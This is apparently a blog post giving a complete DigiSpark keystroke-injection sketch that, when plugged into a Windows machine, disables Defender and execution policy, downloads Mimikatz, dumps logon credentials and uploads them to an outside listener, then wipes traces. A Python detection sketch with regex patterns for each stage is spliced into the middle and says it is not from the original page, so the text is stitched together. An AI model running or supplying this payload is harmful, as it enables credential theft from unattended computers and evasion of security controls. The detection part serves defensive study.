[04] Weaponizing DigiSpark with Mimikatz

What's DigiSpark?

DigiSpark is one of the smallest Arduino-compatible development boards, based on the ATtiny85 microcontroller. It runs directly from the USB 5V supply, has about 6k of flash memory and 6 I/O pins. Its real charm is that it is cheap and affordable, yet powerful enough to run weaponized scripts.


The great plan

Program the DigiSpark to steal credentials from a Windows system as fast and as stealthily as possible. The idea is a quick way to grab credentials from an unattended machine by having the board present itself as a HID (Human Interface Device, i.e. a keyboard).

The process is as follows:

  1. Run a PowerShell session as Admin
  2. Disable the script execution policy restriction
  3. Disable Windows Defender real-time scanning
  4. Download and execute Mimikatz to pull creds
  5. Convert the output to a string
  6. Upload the string to the PHP listener
  7. Revert the AV and policy changes
  8. Clear leftover logs and files
  9. Blink the LED to signal completion


Setting up software

Since the DigiSpark is a microcontroller, it requires an IDE with the proper drivers before it can be programmed.

In this scenario we will be using the Arduino IDE, which is available to download from the Arduino website.

After setting it up, extra drivers are required for Digispark support:

  • Head to File - Preferences
  • In the box named "Additional Boards Manager URL" add the following: http://digistump.com/package_digistump_index.json
  • Click OK
  • Head to the Tools menu
  • Click Boards Manager, which is located in the Board submenu
  • Search for DigiStump and install the drivers

Now you're all set!

Connect the DigiSpark and start uploading your code from the Arduino IDE.


Script

    #include "DigiKeyboard.h"

    void setup() {
      pinMode(1, OUTPUT);                              // on-board LED for model A
    }

    void loop() {
      DigiKeyboard.delay(6000);                        // wait 6 sec before start
      DigiKeyboard.sendKeyStroke(0);
      DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT); // Win + X
      DigiKeyboard.sendKeyStroke(0);
      DigiKeyboard.delay(100);
      DigiKeyboard.sendKeyStroke(KEY_A);               // Run PowerShell as admin
      DigiKeyboard.delay(2000);                        // delay for laggy PCs
      DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);      // select Yes on the UAC prompt
      DigiKeyboard.sendKeyStroke(KEY_ENTER);           // confirm the prompt
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("Set-ExecutionPolicy Unrestricted");                     // enable the script execution policy
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $true");    // disable Windows Defender
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("cd $ENV:temp");                                         // navigate into the temp dir
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("Invoke-WebRequest -Uri 'https://repo.iskullbox.dev/iskullbox/DigiKatz/raw/branch/master/mimi.exe' -OutFile 'mimi.exe'");
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("./mimi.exe 'sekurlsa::logonpasswords full' >> dump.file"); // call Mimikatz to dump system credentials
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("$output = Get-Content dump.file");                      // convert output to a string before upload
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("(New-Object Net.WebClient).UploadString('https://test.iskullbox.dev/listener.php', $output)"); // upload to listener
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("Remove-Item mimi.exe");                                 // remove Mimikatz
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("Set-ExecutionPolicy Restricted");                       // revert policy
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $false");   // re-enable Windows Defender
      DigiKeyboard.delay(1000);
      // remove Run prompt history (backslashes must be doubled inside a C string literal)
      DigiKeyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue");
      DigiKeyboard.delay(1000);
      DigiKeyboard.println("exit");                                                 // exit PowerShell
      DigiKeyboard.delay(1000);
      DigiKeyboard.sendKeyStroke(KEY_ENTER);
      digitalWrite(1, HIGH);                                                        // LED indicator, ready to remove
      DigiKeyboard.delay(10000);
    }
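From a defender's point of view the chain above is noisy: on current Windows builds Defender's Tamper Protection blocks `Set-MpPreference -DisableRealtimeMonitoring $true`, so the attempt itself is the signal; PowerShell script-block logging (Event ID 4104) records every line the board types; and the whole run happens within seconds of a new USB keyboard appearing. The following detection sketch is an added example, not code from this page or from the DigiKatz repository. It assumes a simplified `timestamp|source|message` log format and constructed sample lines, and correlates the stages from the step list and the sketch with a preceding keyboard arrival, reporting high-value stages even when no keyboard arrival is nearby.

```python
"""Detection sketch for the keystroke-injection chain above.

Added example, not code from the page or the DigiKatz repository.
Log format (an assumption): "ISO-timestamp|source|message", where source is
"usb" for device-arrival events or "ps_scriptblock" for PowerShell
script-block logging (Event ID 4104). The sample lines are constructed.
"""
import re
from datetime import datetime, timedelta

# Each stage of the chain typed by the sketch, as a regex over the logged line.
STAGES = [
    ("exec_policy_off", re.compile(r"Set-ExecutionPolicy\s+Unrestricted", re.I)),
    ("defender_off",    re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("cred_dump",       re.compile(r"sekurlsa::logonpasswords", re.I)),
    ("exfil",           re.compile(r"\.UploadString\(", re.I)),
    ("runmru_wipe",     re.compile(r"RunMRU", re.I)),
]
# Stages that warrant an alert on their own, even without a keyboard arrival.
ALWAYS_ALERT = {"defender_off", "cred_dump"}
KEYBOARD_ATTACH = re.compile(r"HID keyboard attached", re.I)

# Constructed sample log: a full run of the chain starting 7 s after a keyboard
# arrives, then benign activity and an unrelated keyboard arrival later on.
SAMPLE_LOG = r"""
2024-05-01T09:00:00|usb|HID keyboard attached (vendor/product ids: placeholder)
2024-05-01T09:00:07|ps_scriptblock|Set-ExecutionPolicy Unrestricted
2024-05-01T09:00:08|ps_scriptblock|Set-MpPreference -DisableRealtimeMonitoring $true
2024-05-01T09:00:09|ps_scriptblock|cd $ENV:temp
2024-05-01T09:00:11|ps_scriptblock|./mimi.exe 'sekurlsa::logonpasswords full' >> dump.file
2024-05-01T09:00:13|ps_scriptblock|(New-Object Net.WebClient).UploadString('https://listener.example.invalid/listener.php', $output)
2024-05-01T09:00:15|ps_scriptblock|Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'
2024-05-01T10:30:00|ps_scriptblock|Get-MpPreference
2024-05-01T11:00:00|usb|HID keyboard attached (vendor/product ids: placeholder)
2024-05-01T11:45:00|ps_scriptblock|Set-ExecutionPolicy RemoteSigned
"""


def parse_log(text):
    """Return (timestamp, source, message) tuples; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, source, message = line.split("|", 2)
        events.append((datetime.fromisoformat(ts), source, message))
    return events


def classify(message):
    """Map one logged line to a stage name, or None if it matches nothing."""
    for name, rx in STAGES:
        if rx.search(message):
            return name
    return None


def detect(events, window=timedelta(seconds=60), min_stages=2):
    """Correlate PowerShell stages with the most recent keyboard arrival.

    An alert is raised for a keyboard arrival when, within `window` after it,
    at least `min_stages` distinct stages appear or any ALWAYS_ALERT stage does.
    ALWAYS_ALERT stages with no keyboard arrival in the window are reported as
    orphans, so the same chain delivered another way is still caught.
    """
    attaches = [ts for ts, src, msg in events
                if src == "usb" and KEYBOARD_ATTACH.search(msg)]
    by_attach = {a: {} for a in attaches}  # attach time -> {stage: seconds after attach}
    orphans = []                           # (timestamp, stage) with no nearby arrival
    for ts, src, msg in events:
        stage = classify(msg) if src == "ps_scriptblock" else None
        if stage is None:
            continue
        owner = max((a for a in attaches if a <= ts <= a + window), default=None)
        if owner is None:
            if stage in ALWAYS_ALERT:
                orphans.append((ts.isoformat(), stage))
        else:
            by_attach[owner].setdefault(stage, int((ts - owner).total_seconds()))
    alerts = []
    for attach, stages in by_attach.items():
        if len(stages) >= min_stages or ALWAYS_ALERT & stages.keys():
            alerts.append({"keyboard_attached_at": attach.isoformat(), "stages": stages})
    return {"alerts": alerts, "orphans": orphans}


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG))["alerts"]:
        print(alert)
```

The stage-to-offset map in each alert doubles as a timeline: five distinct stages landing 7 to 15 seconds after a keyboard arrival is far faster than a human types, which is the tell for HID keystroke injection. A USB device-control policy that blocks unknown keyboard-class devices, and Tamper Protection left enabled, cut the chain off before the credential dump ever runs.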


I think the code is pretty straightforward and the comments are simple; the listener script is available in the repository.

This is still in early alpha, so expect a lot of changes to be made.

A Bash script for automating the install of the server side is still in progress.
Thanks for reading!

rubberducky, digispark, arduino, mimikatz